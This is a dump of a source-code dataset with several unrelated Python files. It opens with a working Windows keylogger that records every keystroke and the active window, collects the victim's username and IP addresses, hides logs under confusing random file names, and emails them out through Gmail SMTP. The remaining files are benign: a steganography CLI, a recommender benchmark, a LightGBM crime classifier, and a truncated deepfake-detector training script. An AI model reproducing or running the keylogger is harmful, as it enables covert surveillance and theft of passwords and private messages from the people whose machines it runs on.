text stringlengths 957 885k |
|---|
<gh_stars>0
"""
ADVANCED KEYBOARD AND MOUSE-CLICK LOGGING PROGRAM
by <NAME>
1/26/2019
Required Modules: Pywin32, Requests, Pynput
"""
from pynput.keyboard import Key, Listener
import os
import random
import requests
import smtplib
import socket
import threading
import time
import win32gui
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import config # Config file with your email info and password
publicIP = requests.get('https://api.ipify.org').text
privateIP = socket.gethostbyname(socket.gethostname())
test = os.path.expanduser('~')
user = os.path.expanduser('~').split('\\')[2]
datetime = time.ctime(time.time())
msg = f'[START OF LOGS]\nDate/Time: {datetime}\nUser-Profile: {user}\nPublic-IP: {publicIP}\nPrivate-IP: {privateIP}\n\n'
log = []
log.append(msg)
print(log)
old_app = ''
delete_file = []
def on_press(input):
global old_app
# Record what application is currently open
new_app = win32gui.GetWindowText(win32gui.GetForegroundWindow())
# Add note in logs if the application changes
if new_app != old_app and new_app != '':
log.append(f'[{datetime}] ~ {new_app}\n')
old_app = new_app
# Substitute input for readability and add it to the log
sub_list = {'Key.enter': '[ENTER]\n', 'Key.backspace': '[BACKSPACE]', 'Key.space': ' ',
'Key.alt_l': '[ALT]', 'Key.alt_r': '[ALT]', 'Key.tab': '[TAB]', 'Key.delete': '[DEL]',
'Key.ctrl_l': '[CTRL]', 'Key.ctrl_r': '[CTRL]', 'Key.left': '[LEFT ARROW]',
'Key.right': '[RIGHT ARROW]', 'Key.shift': '[SHIFT]', '\\x13': '[CTRL-S]', '\\x17':
'[CTRL-W]', 'Key.caps_lock': '[CAPS LOCK]', '\\x01': '[CTRL-A]', 'Key.cmd':
'[WINDOWS KEY]', 'Key.print_screen': '[PRNT SCREEN]', '\\x03': '[CTRL-C]',
'\\x16': '[CTRL-V]'}
input = str(input).strip('\'')
if input == "\"\'\"":
input = "\'"
# Add readbility improvement for Key.shift_r
if input in sub_list:
log.append(sub_list[input])
else:
log.append(input)
"""
Writes the log file to a random location with the order number of the log
followed by an I (which looks like a 1) and random numbers to confuse possible
readers.
"""
def write_file(count):
# Add section for if Linux, if Windows
x = os.path.expanduser('~') + '\\Documents\\'
y = os.path.expanduser('~') + '\\Pictures\\'
z = os.path.expanduser('~') + '\\Music\\'
list = [x] #, y, z]
filepath = list[0] # random.choice(list)
filename = str(count) + '454545' + str(random.randint(10000000, 99999999)) + '.txt'
file = filepath + filename
delete_file.append(file)
print(filename)
with open(file, 'w') as fp:
fp.write(''.join(log))
def send_logs():
count = 0
fromAddr = config.fromAddr
fromPswd = config.fromPswd
toAddr = fromAddr
while True:
if len(log) > 1:
# Set how often the emails are sent (in seconds), default is 6 minutes
time.sleep(600)
write_file(count)
msg = MIMEMultipart()
msg['From'] = fromAddr
msg['To'] = toAddr
msg['Subject'] = f'[{user}] Log:{count}'
body = 'testing'
msg.attach(MIMEText(body, 'plain'))
attachment = open(delete_file[0], 'rb')
filename = delete_file[0].split('\\')[2]
print(filename)
email = MIMEBase('application', 'octet-stream')
email.set_payload((attachment).read())
encoders.encode_base64(email)
email.add_header('content-disposition', 'attachment;filename='+str(filename))
msg.attach(email)
text = msg.as_string()
print(attachment)
# Send logs via email
try:
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login(fromAddr, fromPswd)
server.send_message(msg)
#server.sendmail(fromAddr, toAddr)
print("fail4")
attachment.close()
server.close()
print("made it")
except:
print("\n\nCant get to server")
print("Cant get to server")
print("Cant get to server\n\n")
"""# Delete logs
os.remove(delete_file[0])
del log[1:]
del delete_file[0:]"""
count += 1
else:
pass
# Prevent file from being imported
if __name__=='__main__':
t1 = threading.Thread(target=send_logs)
t1.start()
with Listener(on_press=on_press) as listener:
listener.join()
|
from argparse import ArgumentParser, RawTextHelpFormatter
from filetype import is_image
from os import path
def _consent(args, output):
if path.exists(args[output]):
args[output] = path.abspath(args[output])
consent_ = input(f"Warning!!! \nThe '{args[output]}' file already exists."
f"\nDo you wish to overwrite?(y/n)[Default=n] ").lower() or 'n'
if consent_ in ['y', 'yes']:
pass
elif consent_ in ['n', 'no']:
print("Exiting...")
exit(0)
else:
print("Invalid option.")
_consent(args, output)
return args
def is_valid_file(arg) -> str:
if not path.isfile(arg):
return arg
else:
with open(arg, 'r') as f:
return f.read()
def get_args():
my_args = ArgumentParser(fromfile_prefix_chars='_',
description="Hide/extract messages from an image using LSB encoding.\n"
"(LSB = Least Significant Bit)",
# usage="python lsb.py [-h] en|de ...",
formatter_class=RawTextHelpFormatter,
epilog="Made by [shankar12789](https://github.com/shankar12789)")
my_args.version = version_info
my_args.add_argument('-v', '--version',
action='version')
action = my_args.add_subparsers(title="Action",
dest='action',
required=True,
metavar="encode|decode",
help="Choose one of the two operation.")
encode = action.add_parser(name='encode',
aliases=['en'],
help='Do encoding operation.\nFor more info: "python %(prog)s encode -h"',
formatter_class=RawTextHelpFormatter,
description="Encode a MESSAGE inside an IMAGE.\nSupported Image Formats: "
"'CMYK', 'HSV', 'LAB', 'RGB', 'RGBA', 'RGBX', 'YCbCr'."
"\nAny other format will result in error.",
epilog="Made by [shankar12789](https://github.com/shankar12789)")
en_required = encode.add_argument_group("Required")
en_required.add_argument('-i', '--input',
action='store',
type=str,
required=True,
metavar='IP_IMAGE',
help="Path of the IP_IMAGE into which the MESSAGE will be encoded."
"\nNote: Has been tested with PNG images only."
"\nOther extensions are NOT TESTED and may produce errors.")
en_required.add_argument('-t', '--text',
action='store',
type=lambda x: is_valid_file(x),
required=True,
metavar="MESSAGE|FILE",
help='The MESSAGE to be encoded. The MESSAGE can be entered directly within quotes(" ") '
'\nor from a file by appending \'@\' before the path of the FILE.'
'\nEx: -t @/home/USER/Desktop/sample.txt'
'\nNote: 1. Only full path and relative path are supported.'
'\n 2. "~" and other environment variables are not resolved.'
'\n 3. MESSAGE can be anything as long as their size is less than the IMAGE '
'\n itself,including the PASSWORD.')
en_optional = encode.add_argument_group("Optional")
en_optional.add_argument('-p', '--passwd',
action='store',
type=str,
metavar="PASSWORD",
help="The PASSWORD to encode your message. Default: IP_IMAGE name."
"\nNote: 1. For maximum security generate a random string of minimum 8 characters."
"\n 2. There is no password recovery method. "
"\n So, be sure to store your password.")
en_optional.add_argument('-o', '--output',
action='store',
type=str,
metavar='OP_IMAGE',
dest="op_image",
help="Name of the resultant OP_IMAGE file. Default: \"encoded.png\"")
decode = action.add_parser('decode',
aliases=['de'],
help='Do decoding operation. \nFor more info: "python %(prog)s decode -h"',
formatter_class=RawTextHelpFormatter,
description="Decode a MESSAGE from an IMAGE (if it exists).",
epilog="Made by [shankar12789](https://github.com/shankar12789)")
de_required = decode.add_argument_group("Required")
de_required.add_argument('-i', '--input',
action='store',
type=str,
required=True,
metavar="IP_IMAGE",
help="Path of the IP_IMAGE to be decoded.")
de_required.add_argument('-p', '--passwd',
action='store',
type=str,
required=True,
metavar="PASSWORD",
help="The PASSWORD to decode the MESSAGE. "
"\nDefault: The original name of the IMAGE before Encoding.")
de_optional = decode.add_argument_group("Optional")
de_optional.add_argument('-o', '--output',
action='store',
type=str,
metavar="FILE",
dest="op_text",
help="The path of the FILE where the decoded MESSAGE will be written to. "
"\nDefault: The terminal itself")
args = my_args.parse_args()
args = vars(args)
if not (path.exists(args['input']) and is_image(args['input'])):
print(f"{args['input']} doesn't exist or unsupported.")
exit(1)
if args['passwd'] is None:
args['passwd'] = path.basename(args['input'])
if 'op_image' in args:
if args['op_image'] is None:
args['op_image'] = path.join(path.curdir, 'outputs', 'encoded.png')
return _consent(args, 'op_image')
if 'op_text' in args and args['op_text'] is not None and path.exists(args['op_text']):
return _consent(args, 'op_text')
return args
version_info = '1.0.5'
if __name__ == '__main__':
print(get_args())
|
from recogym import env_1_args
from models.models_organic_bandit import RecoModelRTAEWithBanditTF, RecoModelRTAEWithBanditTF_Full
from models.models_organic import RecoModelRTAE, RecoModelItemKNN
from models.liang_multivae import MultiVAE
from recogym.agents import organic_user_count_args
from recogym.agents import RandomAgent, random_args
from models.models_bandit import PyTorchMLRAgent, pytorch_mlr_args
from models.model_based_agents import ModelBasedAgent
from utils.utils_agents import eval_against_session_pop, first_element
import tensorflow as tf
import pandas as pd
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--algorithm', type=str, default='rt/ae', help='algorithm path.')
parser.add_argument('--batch_size', type=int, default= 1024, help='batch size.')
parser.add_argument('--lr', type=float, default=0.000001, help='Initial learning rate.')
parser.add_argument('--K', type=int, default=10, help='K.')
parser.add_argument('--rcatk', type=int, default=5, help='recall at')
parser.add_argument('--P', type=int, default=20, help='Threshold products at this value Yoochoose.')
parser.add_argument('--cudavis', type=str, default=None, help='restrict gpu usage')
parser.add_argument('--units', type=list, default=None, help='ae units')
parser.add_argument('--batch_size_test', type=int, default=5, help='batch size.')
parser.add_argument('--reg_Psi', type=float, default=0.1, help='reg.')
parser.add_argument('--reg_shift', type=float, default=0.0, help='reg.')
parser.add_argument('--reg_rho', type=float, default=1, help='reg.')
parser.add_argument('--test_freq', type=int, default=1, help='how often to do test set eval on tb')
parser.add_argument('--neg_samples', type=int, default=1, help='')
parser.add_argument('--num_sessions', type=int, default= 100, help='')
parser.add_argument('--num_sessions_organic', type=int, default=0, help='')
parser.add_argument('--num_users_to_score', type=int, default= 100, help='')
parser.add_argument('--organic_epochs', type=int, default=10, help='')
parser.add_argument('--bandit_epochs', type=int, default=10, help='')
args = parser.parse_args()
dict_args = vars(args)
num_sessions=args.num_sessions
num_sessions_organic=args.num_sessions_organic
sig_omega = 0.
P = args.P
dict_args['P'] = P
r = []
results_path = 'results/'
num_users_to_score = args.num_users_to_score
seed = 0
latent_factor = 10
num_organic_users_to_train = 0
eval_fn = eval_against_session_pop
log_eps = 0.3
for rep in range(1, 20):
for num_flips in [0, int(P/2)]:
res = []
# Organic LVM
dict_args['lr'] = 0.0001
dict_args['num_epochs'] = args.organic_epochs
dict_args['use_em'] = False
dict_args['organic'] = True
dict_args['weight_path'] = 'weights/linAE'
parameters = {
'recomodel': RecoModelRTAE,
'modelargs': dict_args,
'num_products': P,
'K': args.K
}
sc_lvm = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, parameters,str(parameters['recomodel']), True)
sc_lvm = first_element(sc_lvm,'LVM')
res.append(sc_lvm)
# LVM Bandit
dict_args['lr'] = 0.001
dict_args['num_epochs'] = args.organic_epochs
dict_args['num_epochs_bandit'] = args.bandit_epochs
dict_args['use_em'] = False
dict_args['organic'] = False
dict_args['norm'] = True
dict_args['organic_weights'] = 'weights/linAE'
dict_args['wa_m'] = -1.0
dict_args['wb_m'] = -6.0
dict_args['wc_m'] = -4.5
dict_args['wa_s'] = 1.
dict_args['wb_s'] = 1.
dict_args['wc_s'] = 10.
dict_args['kappa_s'] = 0.01
parameters = {
'recomodel': RecoModelRTAEWithBanditTF,
'modelargs': dict_args,
'num_products': P,
'K': args.K,
}
with tf.variable_scope('', reuse=tf.AUTO_REUSE):
sc_bandit = eval_fn(P, num_sessions_organic, num_sessions,
num_users_to_score, seed, latent_factor,
num_flips, log_eps, sig_omega, ModelBasedAgent,
parameters,str(parameters['recomodel']), True)
sc_bandit = first_element(sc_bandit, 'LVM Bandit MVN-Q')
res.append(sc_bandit)
# LVM Bandit Gaussian instead of Matrix normal posterior
dict_args['lr'] = 0.001
dict_args['num_epochs'] = args.organic_epochs
dict_args['num_epochs_bandit'] = args.bandit_epochs
dict_args['use_em'] = False
dict_args['organic'] = False
dict_args['norm'] = True
dict_args['organic_weights'] = 'weights/linAE'
dict_args['wa_m'] = -1.0
dict_args['wb_m'] = -6.0
dict_args['wc_m'] = -4.5
dict_args['wa_s'] = 1.
dict_args['wb_s'] = 1.
dict_args['wc_s'] = 10.
dict_args['kappa_s'] = 0.01
parameters = {
'recomodel': RecoModelRTAEWithBanditTF_Full,
'modelargs': dict_args,
'num_products': P,
'K': args.K,
}
with tf.variable_scope('', reuse=tf.AUTO_REUSE):
sc_bandit = eval_fn(P, num_sessions_organic, num_sessions,
num_users_to_score, seed, latent_factor,
num_flips, log_eps, sig_omega, ModelBasedAgent,
parameters,str(parameters['recomodel']), True)
sc_bandit = first_element(sc_bandit, 'LVM Bandit NQ')
res.append(sc_bandit)
#CB
pytorch_mlr_args['n_epochs'] = args.bandit_epochs
pytorch_mlr_args['learning_rate'] = 0.01
pytorch_mlr_args['ll_IPS'] = False
pytorch_mlr_args['alpha'] = 0.0
pytorch_mlr_args['num_products'] = P
sc_log_reg = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, PyTorchMLRAgent, pytorch_mlr_args ,str(pytorch_mlr_args), True)
sc_log_reg = first_element(sc_log_reg, 'CB')
res.append(sc_log_reg)
#log reg
pytorch_mlr_args['n_epochs'] = args.bandit_epochs
pytorch_mlr_args['learning_rate'] = 0.01
pytorch_mlr_args['ll_IPS'] = False
pytorch_mlr_args['alpha'] = 1.0
pytorch_mlr_args['num_products'] = P
sc_log_reg = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, PyTorchMLRAgent, pytorch_mlr_args ,str(pytorch_mlr_args), True)
sc_log_reg = first_element(sc_log_reg, 'log reg')
res.append(sc_log_reg)
# Random
random_args['P'] = P
parameters = {
**organic_user_count_args,
**env_1_args,
'select_randomly': True,
'modelargs': random_args,
}
sc_rand = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, RandomAgent, parameters,'randomagent', True)
sc_rand = first_element(sc_rand,'random')
res.append(sc_rand)
# mean Itemknn
dict_args['organic'] = True
parameters = {
'recomodel': RecoModelItemKNN,
'modelargs': dict_args,
'num_products': P,
'K': 10}
sc_itemknn = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, parameters ,str(parameters['recomodel']), True)
sc_itemknn['model']='ItemKNN_mean'
sc_itemknn = first_element(sc_itemknn,'ItemKNN_mean')
res.append(sc_itemknn)
# Liang multivae
model_based_agent_args = {}
model_based_agent_args['num_products'] = P
model_based_agent_args['P'] = P
model_based_agent_args['lam'] = 0.01
model_based_agent_args['lr'] = 1e-3
model_based_agent_args['random_seed'] = 98765
model_based_agent_args['p_dims'] = [10, P]
model_based_agent_args['q_dims']= None
model_based_agent_args['num_epochs'] = args.organic_epochs
model_based_agent_args['batch_size']= args.batch_size
model_based_agent_args['organic'] = True
# the total number of gradient updates for annealing
model_based_agent_args['total_anneal_steps'] = 200000
# largest annealing parameter
model_based_agent_args['anneal_cap'] = 0.2
lvm_parameters = {
'recomodel': MultiVAE,
'modelargs': model_based_agent_args,
'num_products': P,
'K': 10,
}
with tf.variable_scope('', reuse=tf.AUTO_REUSE):
sc_mult = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, lvm_parameters,str(lvm_parameters['recomodel']), True)
sc_mult = first_element(sc_mult,'MultiVAE')
res.append(sc_mult)
results = pd.concat(res)
results['seed']=seed
results['flips']=num_flips
results['logging'] = str(eval_fn).replace('<function ','').split(' at')[0].replace('eval_against_','')
results['rep'] = str(rep)
r.append(results)
pd.concat(r).to_csv(results_path + 'interim_results.csv')
print('saving')
print(pd.concat(r))
pd.concat(r).to_csv(results_path + 'interim_results_%d.csv' % rep)
print(pd.concat(r))
pd.concat(r).to_csv(results_path + 'final_results.csv')
|
<reponame>TiRoX/bi2018<filename>BI/0807_BI_GBDT.py
# -*- coding: utf-8 -*-
'''
@author: TheUniverse
'''
#Module importieren
import pandas as pd
import scipy.stats as stats
import lightgbm
import os
import numpy as np
from sklearn import preprocessing
from sklearn.preprocessing import LabelEncoder
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
os.environ["PATH"] += os.pathsep + 'H:/workspace coding/graphviz/bin'
'''
Hi, My name is Kevin. If ure reading this, youre probably reading it on your screen~
garphviz:
https://stackoverflow.com/questions/35064304/runtimeerror-make-sure-the-graphviz-executables-are-on-your-systems-path-aft
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
windowstaste --> systemumgebungsvariablen bearbeiten
https://imgur.com/a/tZHiAlb
'''
class DataHandler:
training_data = None
testing_data = None
category_mapping = {"ARSON": 0,
"ASSAULT": 1,
"BAD CHECKS": 2,
"BRIBERY": 3,
"BURGLARY": 4,
"DISORDERLY CONDUCT": 5,
"DRIVING UNDER THE INFLUENCE": 6,
"DRUG/NARCOTIC": 7,
"DRUNKENNESS": 8,
"EMBEZZLEMENT": 9,
"EXTORTION": 10,
"FAMILY OFFENSES": 11,
"FORGERY/COUNTERFEITING": 12,
"FRAUD": 13,
"GAMBLING": 14,
"KIDNAPPING": 15,
"LARCENY/THEFT": 16,
"LIQUOR LAWS": 17,
"LOITERING": 18,
"MISSING PERSON": 19,
"NON-CRIMINAL": 20,
"OTHER OFFENSES": 21,
"PORNOGRAPHY/OBSCENE MAT": 22,
"PROSTITUTION": 23,
"RECOVERED VEHICLE": 24,
"ROBBERY": 25,
"RUNAWAY": 26,
"SECONDARY CODES": 27,
"SEX OFFENSES FORCIBLE": 28,
"SEX OFFENSES NON FORCIBLE": 29,
"STOLEN PROPERTY": 30,
"SUICIDE": 31,
"SUSPICIOUS OCC": 32,
"TREA": 33,
"TRESPASS": 34,
"VANDALISM": 35,
"VEHICLE THEFT": 36,
"WARRANTS": 37,
"WEAPON LAWS": 38}
def __init__(self):
self.training_data = None
self.testing_data = None
def load_data(self, train, test):
self.training_data = train
self.testing_data = test
# <big_data> DataFrame erstellen um feature preprocessing zu vereinfachen
# Ausgabe ist ein Dictionary wo train-Datensatz aufgeteilt wird.
def transform_data(self, with_mask=1):
features_columns = [ 'Year', 'Month', 'Hour', 'PdDistrict', 'X', 'Y'] #[ 'Year', 'Month', 'Day', 'Time', 'DayOfWeek', 'PdDistrict', 'X', 'Y']
big_data = self.training_data[features_columns].append(self.testing_data[features_columns])
categorical_features = ['Year', 'Month', 'Hour', 'PdDistrict']
numerical_features = ['X', 'Y']
print ('Encoding der Features')
big_data = self.categorical_encoder(big_data, categorical_features)
print ('Skalieren der Longitude und Latitude')
big_data = self.features_preprocessing(big_data, numerical_features)
train_X = big_data[0:self.training_data.shape[0]]
train_Y = self.training_data['Category'].map(self.category_mapping)
test_x = big_data[self.training_data.shape[0]::]
if with_mask != 1:
mask = np.random.rand(len(self.training_data)) < with_mask
train_X = train_X[mask]
train_Y = train_Y[mask]
print ('Splitten des Datensatzes für Validierung bei Modelerstellung')
x_train_split, x_test_split, y_train_split, y_test_split = train_test_split(train_X, train_Y, test_size=0.3, random_state=42)
return {'x_train_split': x_train_split, 'y_train_split': y_train_split, 'x_test_split': x_test_split, 'y_test_split': y_test_split, 'test_x': test_x}
def features_preprocessing(self, data, numerical_columns):
for num_col in numerical_columns:
data[num_col] = preprocessing.scale(data[num_col])
return data
def categorical_encoder(self, data, categorical_columns):
le = LabelEncoder()
for cat_col in categorical_columns:
data[cat_col] = le.fit_transform(data[cat_col])
return data
def main():
df = readF("train.csv", True) # True wenn Index im File vorhanden, wie hier.
test = readF('test.csv', False)
dh = DataHandler()
dh.load_data(train=df, test=test)
data_sets = dh.transform_data()
# with pd.option_context('display.max_rows', 11, 'display.max_columns', 200):
#print(data_sets)
#exit()
resulttrain= lgbm(data_sets)
print(resulttrain)
exit()
def readF(path, index):
print('Reading: ', path)
if (index == True):
df = pd.read_csv(path, delimiter= ',', quotechar='"', header = 0, error_bad_lines=False, dtype={"AddressSuffix": str, 'X': float, 'Y': float}) # , dtype={"Date": str, "Time": str, "Year": int, "Month": int, "Day": int, "Hour": int, "Season": str, "Descript": str, "DayOfWeek": str, "PdDistrict": str, "Resolution": str, "Address": str, "AdressSuffix": str, "X": str, "Y": str} columns mit (delimiter";"), die headzeile ist die 0., dtype bestimmt datentyp der Columns
else:
df = pd.read_csv(path, delimiter= ',', quotechar='"', header = 0, error_bad_lines=False, dtype={"AddressSuffix": str, 'X': float, 'Y': float}, index_col=0) # , dtype={"Date": str, "Time": str, "Year": int, "Month": int, "Day": int, "Hour": int, "Season": str, "Descript": str, "DayOfWeek": str, "PdDistrict": str, "Resolution": str, "Address": str, "AdressSuffix": str, "X": str, "Y": str} columns mit (delimiter";"), die headzeile ist die 0., dtype bestimmt datentyp der Columns
print('Transforming', path)
df['Year'] = df['Dates'].str[:4]
df['Month'] = df['Dates'].str[5:7]
df['Day'] = df['Dates'].str[8:10]
df['Hour'] = df['Dates'].str[11:13]
df['Season'] = df.apply(get_season, axis=1)
df['DayOfWeek'] = df['DayOfWeek'].str.upper()
#df['X'] = df['X'].apply(lambda x: 0 if float(x)>=-122.3649 or float(x)<=-122.5136 else x)#
df['X'] = df['X'].apply(lambda x: 0 if float(x)>-122.3649 or float(x)<-122.513642064265 else x)
df['Y'] = df['Y'].apply(lambda y: 0 if float(y)<37.70788 or float(y)>37.81998 else y) #verzieht die Auswertung über Chi-Square
#alle datensätze mit ungültigen koords löschen
df = df[df.X != 0]
df = df[df.Y != 0]
with pd.option_context('display.max_rows', 11, 'display.max_columns', 200):
df = df.drop('Dates', 1)
df = df.drop('Address', 1)
if (path == 'train.csv'):
df = df.drop('Descript', 1)
df = df.drop('Resolution', 1)
print('Success for ', path)
return df
def get_season(row):
if 3 <= int(row['Dates'][5:7]) <= 5:
return "SPRING"
elif 6 <= int(row['Dates'][5:7]) <= 8:
return "SUMMER"
elif 9 <= int(row['Dates'][5:7]) <= 11:
return "AUTUMN"
else: return "WINTER"
"""
Feature Extraction
Feature Extraction mit ChiSquare Test, welcher Wert nimmt am meisten Einfluß wenn Null Hypothese gilt
Chi-Square Erklärung 5-min YouTube: https://www.youtube.com/watch?v=VskmMgXmkMQ ;; Besser: https://www.youtube.com/watch?v=WXPBoFDqNVk (12 min)
Quelle: http://www.handsonmachinelearning.com/blog/2AeuRL/chi-square-feature-selection-in-python
"""
class ChiSquare:
def __init__(self, dataframe):
self.df = dataframe
self.p = None #P-Value
self.chi2 = None #Chi Test Statistic
self.dof = None
self.dfTabular = None
self.dfExpected = None
def _print_chisquare_result(self, colX, alpha):
result = ""
if self.p<alpha: # If P is low, Ho (null hypothesis) must go... - alpha is der Wert der bestimmt ob Null Hypothese zutrifft oder nicht
result="{} is IMPORTANT for Prediction. Value of chi2 {}".format(colX, self.chi2)
else:
result="{} is NOT an important predictor. Value of chi2 {}".format(colX, self.chi2)
print(result)
def TestIndependence(self,colX,colY, alpha=0.1):
X = self.df[colX].astype(str)
Y = self.df[colY].astype(str)
self.dfObserved = pd.crosstab(Y,X)
chi2, p, dof, expected = stats.chi2_contingency(self.dfObserved.values)
self.p = p
self.chi2 = chi2
self.dof = dof
self.dfExpected = pd.DataFrame(expected, columns=self.dfObserved.columns, index = self.dfObserved.index)
self._print_chisquare_result(colX, alpha)
#Feature Selection
def useChi(cT):
testColumns = ['Year', 'Month', 'Hour', 'PdDistrict', 'X', 'Y'] #['Year', 'Month', 'Day', 'Time', 'DayOfWeek', 'PdDistrict', 'X', 'Y']
for var in testColumns: #Für jede einzelne Column wird Chi-Square ausgeführt
cT.TestIndependence(colX=var,colY="Category") #Aufruf des Chi-Square Test mit Resolution als abhängiges Features
def lgbm(data_set):
# Quelle -> https://github.com/Microsoft/LightGBM/blob/master/tests/python_package_test/test_sklearn.py
print ('Aufteilen des Datensatzes nach Feature Preprocessing')
x_train_split_t = data_set['x_train_split']
y_train_split_t = data_set['y_train_split']
x_test_split_t = data_set['x_test_split'] #Erstellung von Test df um auswerten zu könne -> vorher einer unseren großen Fehler
y_test_split_t = data_set['y_test_split']
test_x = data_set['test_x']
print ('setup training and eval')
lgb_train = lightgbm.Dataset(x_train_split_t, y_train_split_t)
lgb_eval = lightgbm.Dataset(test_x, reference=lgb_train)
print ('trying to perform GBDT')
clf = lightgbm.LGBMClassifier(boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=127, subsample_for_bin=200000, objective='multiclass', silent=False )
clf.fit(x_train_split_t, y_train_split_t, eval_set=[(x_test_split_t, y_test_split_t)])
with pd.option_context('display.max_rows', 11, 'display.max_columns', 200):
clf.predict(test_x)
#print(y_pred)
#pred_string=np.array_str(y_pred)
#print (pred_string)
#with open('pred_file.txt','w') as f:
# f.write(pred_string)
print ('trying to plot here?')
#fuck graphviz
#ax = lightgbm.plot_tree(clf, tree_index=83, show_info=['split_gain'])
#ax = lightgbm.plot_tree(clf, tree_index=83, figsize=(500, 80), show_info=['split_gain'])
# plt.show(ax)
print('Plotte die Features')
#graph1 = lightgbm.plot_importance(clf, max_num_features=10, name ='importance')
#graph1.render(view=True)
#plt.show(graph1)
print('Plotte finalen Baum (1.)')
graph2 = lightgbm.create_tree_digraph(clf, tree_index=0, name='<NAME>')
graph2.render(view=True)
plt.show(graph2)
print('Plotte finalen Baum (72.)')
graph3 = lightgbm.create_tree_digraph(clf, tree_index=71, name='Finale Baum')
graph3.render(view=True)
plt.show(graph3)
#Multi_LogLoss bei 2.40556 ohne Day und DayOfWeek [StandardConfig]
#Multi_LogLoss bei 2.40635 mit Day und DayOfWeek [StandardConfig]
#Multi_LogLoss bei 2.40207 ohne Day und DayOfWeek - Iteration 127 - Danach Anstieg - [StandardConfig]
#Multi_LogLoss bei 2.35994 ohne Day und DayOfWeek - Iteration 63 - Danach Anstieg - [StandardConfig] + num_leaves = 1521
#Multi_LogLoss bei 2.35076 ohne Day und DayOfWeek - Iteration 72 - Danach Anstieg - [StandardConfig] + num_leaves = 1000
#Aufrufen der Ausführung, bitte ganz unten
main()
|
import argparse
import random
import shutil
import tensorflow as tf
import tensorflow.keras as keras
import os
import Data
import Model
import time
from tensorflow.keras import backend as K
def makeDataList(files):
train = []
val = []
test = []
for file in files:
with open(file, 'r') as f:
data = f.readlines()
random.shuffle(data)
train += data[:750]
val += data[750:875]
test += data[875:]
random.shuffle(train)
random.shuffle(val)
random.shuffle(test)
return train, val, test
if __name__ == '__main__':
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
# tf.keras.backend.set_floatx('float16')
# os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
# tf.keras.mixed_precision.set_global_policy('mixed_float16')
parser = argparse.ArgumentParser()
parser.add_argument("--augment", '-a', help="data augment", type=bool, default=True)
parser.add_argument("--size", '-s', nargs=2, help="the size of frames", type=int, default=[224, 224])
parser.add_argument("--message", '-m', help="commit", type=str, default="")
parser.add_argument("--batchsize", '-b', help="batch size", type=int, default=1)
parser.add_argument("--att", help="need att", type=str, default='proposed')
parser.add_argument("--cnn", '-c', help="cnn archi", type=str, default='xcep')
parser.add_argument("--rnn", '-r', help="rnn archi", type=str, default='convlstm')
parser.add_argument("--frames", '-f', help="the nums of frames in one video", type=int, default=30)
parser.add_argument("--fake", help="the fake image", type=str, default='df')
parser.add_argument("--gpu", help="the num of gpu", type=str, default='0')
args = parser.parse_args()
gpu = args.gpu
size: list = args.size
batchSize = args.batchsize
message = args.message
cnn = args.cnn
rnn = args.rnn
frames = args.frames
fakedata = args.fake
att = args.att
archi = cnn + rnn + att + "_frames"+str(frames)+"_"
os.environ["CUDA_VISIBLE_DEVICES"] = gpu
if fakedata == 'df':
fakedata = "Deepfakes"
elif fakedata == 'fs':
fakedata = "FaceSwap"
elif fakedata == 'ff':
fakedata = "Face2Face"
elif fakedata == "nt":
fakedata = "NeuralTextures"
commit = message + archi + fakedata + time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime())
if not os.path.exists("./result"):
os.mkdir("./result")
resultsFolder = "./result/" + commit
if not os.path.exists(resultsFolder):
os.mkdir(resultsFolder)
checkpointsFolder = os.path.join(resultsFolder, "./checkpoints")
if not os.path.exists(checkpointsFolder):
os.mkdir(checkpointsFolder)
logsFolder = os.path.join(resultsFolder, "logs")
if not os.path.exists(logsFolder):
os.mkdir(logsFolder)
codeFolder = os.path.join(resultsFolder, "code")
if not os.path.exists(codeFolder):
os.mkdir(codeFolder)
codeFiles = os.listdir("./")
for codeFile in codeFiles:
if codeFile.split(".")[-1] == "py":
shutil.copy(codeFile, codeFolder)
with open(resultsFolder+"/info", 'w') as f:
f.writelines(str(args))
dataFolder = "/data/ltm/keras/dataFile"
# folders = ["Deepfakes0", "Face2Face0", "FaceSwap0", "NeuralTextures0",
# "youtube0", "youtube1", "youtube2", "youtube3"]
folders = [fakedata+"0", "youtube0"]
if fakedata == "all":
folders = ["Deepfakes0", "Face2Face0", "FaceSwap0", "NeuralTextures0",
"youtube0", "youtube1", "youtube2", "youtube3"]
dataFolder = [os.path.join(dataFolder, folder) for folder in folders]
train, val, test = makeDataList(dataFolder)
with open(resultsFolder+"/test_data_list", 'w') as f:
f.writelines(test)
trainSet = Data.MyData(train, "train", batchSize, shape=tuple(size), num=frames)
valSet = Data.MyData(val, "val", batchSize, shape=tuple(size), num=frames)
inputShape = size.append(3)
model = Model.getModel(cnn=cnn, rnn=rnn, att=att, inputShape=inputShape, frames=frames)
optim = tf.keras.optimizers.Adam(learning_rate=0.00001,
beta_1=0.9, beta_2=0.999, epsilon=1e-07, amsgrad=False, name='Adam')
loss = tf.keras.losses.BinaryCrossentropy()
model.compile(optimizer=optim, loss="binary_crossentropy",
metrics=['acc'], run_eagerly=False)
callbacks = [
